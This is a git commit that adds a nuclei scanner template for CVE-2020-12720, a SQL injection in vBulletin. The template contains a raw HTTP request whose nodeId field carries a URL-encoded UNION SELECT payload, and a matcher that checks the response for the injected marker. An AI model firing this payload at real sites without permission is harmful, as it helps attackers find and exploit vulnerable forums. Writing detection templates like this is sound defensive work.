Added CVE-2020-12720 vBulletin SQLI

patch-1
bauthard 2020-05-22 03:17:20 +05:30 committed by GitHub
parent 7140d8c18a
commit 4a33940a37
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

30
cves/CVE-2020-12720.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-12720
info:
name: CVE-2020-12720 vBulletin SQLI
author: pdnuclei - projectdiscovery.io
severity: critical
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
# This template supports the detection part only.
# Do not test any website without permission
requests:
- raw:
- |
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
nodeId%5Bnodeid%5D=1+UNION+SELECT+26%2C25%2C24%2C23%2C22%2C21%2C20%2C19%2C20%2C17%2C16%2C15%2C14%2C13%2C12%2C11%2C10%2C%22vbulletinrcepoc%22%2C8%2C7%2C6%2C5%2C4%2C3%2C2%2C1%3B--+-
matchers:
- type: word
words:
- "vbulletinrcepoc"